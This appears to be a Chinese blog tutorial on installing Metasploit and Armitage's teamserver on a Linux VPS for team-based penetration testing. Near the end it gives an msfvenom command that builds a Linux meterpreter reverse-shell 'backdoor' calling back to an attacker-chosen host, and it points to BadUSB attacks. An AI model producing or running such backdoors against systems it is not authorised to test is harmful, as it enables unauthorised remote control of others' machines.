前言:

之前写了关于Cobalt Strike在外网部署的文章,但是发现是针对windows平台的渗透,确实很给力。但是我现在遇到很多Linux的服务器,所以突然我又想到了结合metasploit的armitage。发现都是很老的一些资料,这里自己整理了一下。那些很老的armitage感觉都已经不适用了,armitage作者官网上面最新的和kali Linux里面的一样,同时也支持windows平台的,下载Linux版本的里面有一个和cobalt Strike相同名字的团队运行程序(teamserver),运行的方式和Cobalt Strike的方式一样。

下面是必须的工具,如果ubuntu通过apt-get命令安装的metasploit好像默认没有安装metaspolit服务,所以启动会失败。我们这里用了命令行界面下载并加权限安装。

开始安装必要的东西:

更新:

这里忘了说了,因为armitage的teamserver需要JAVA环境,但是如果你的vps什么都没有的话,需要安装。(没人看,所以也没有人反馈,因为自己重新部署的时候发现了这个问题)

安装JAVA环境

这里使用ppa/源方式安装

1.添加ppa

sudo add-apt-repository ppa:webupd8team/java

sudo apt-get update

2.安装oracle-java-installer

jdk7

sudo apt-get install oracle-java7-installer

jdk8

sudo apt-get install oracle-java8-installer

安装器会提示你同意 oracle 的服务条款,选择 ok

然后选择yes 即可

通过如下命令安装metasploit

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

第二种,这种方法感觉很大,很麻烦,所以推荐上面那种。

wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run   #下载速度要取决于你们的服务器速度了,AWS下载的时候90M

chmod +x metasploit-latest-linux-x64-installer.run

./metasploit-latest-linux-x64-installer.run

运行的时候一堆条款全部通过,默认的路径默认的端口,问你是否安装metaspolt服务的时候一定要安装,这也是上面说了为什么不通过apt-get安装的原因。(不知道是不是自己没操作好,反正启动服务的时候,说没有这个服务)

启动metaspolit 服务

service metaspolit start

 

启动postgresql 服务

service postgresql start

这个启动就好了,没有那些多余的设置,或者你可以自己去设置用户名密码什么的,然后在msfconsole里面db_connect

下载并启动armitage 服务

wget http://www.fastandeasyhacking.com/download/armitage150813.tgz  #工具下载地址,解压了里面包含armitage和teamserver服务

tar -zxvf armitage150813.tgz

cd armitage

./teamserver ip pass

运行的团队服务更Cobalt Strike的方式一样,但是运行成功会有下面这种提示。

这里建议使用

nohup ./teamserver ip pass &  # IP填自己的服务器  pass是密码,自己设置什么都可以下面成功运行会提示的。

或者可以加到系统启动项里面。

下载windwos版本的,解压出来,运行armitage,填写你的服务器IP,端口、密码、账号刚刚都在回现里面,自己填,然后输入你在团队里面的昵称,就像下面这样。

 

window版本armitage下载地址(貌似要fq)

armitage百度盘 :gsgi

生成Linux后门:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=地址 LPORT=端口 -f elf -o /root/Desktop/backdoor 
 #地址就是反弹的地址,端口自己设置,-p就是payload这个可以自己选,在console里面search一下想要的,然后自己本地进行监听。chmod +x backdoor运行就可以了

 

至此:现在可以想怎么玩儿就怎么玩了。

平台都已经搭建得差不多了,下面就准备研究一下Bad USB了,感觉这个东西应该会很不错的。

http://www.freebuf.com/articles/terminal/131193.html  基于ArduinoLeonardo板子的BadUSB攻击实战

相关资料:

http://www.fastandeasyhacking.com/manual#7   armitage的作者博客

http://www.91ri.org/7262.html  91ri-Metasploit数据库问题汇总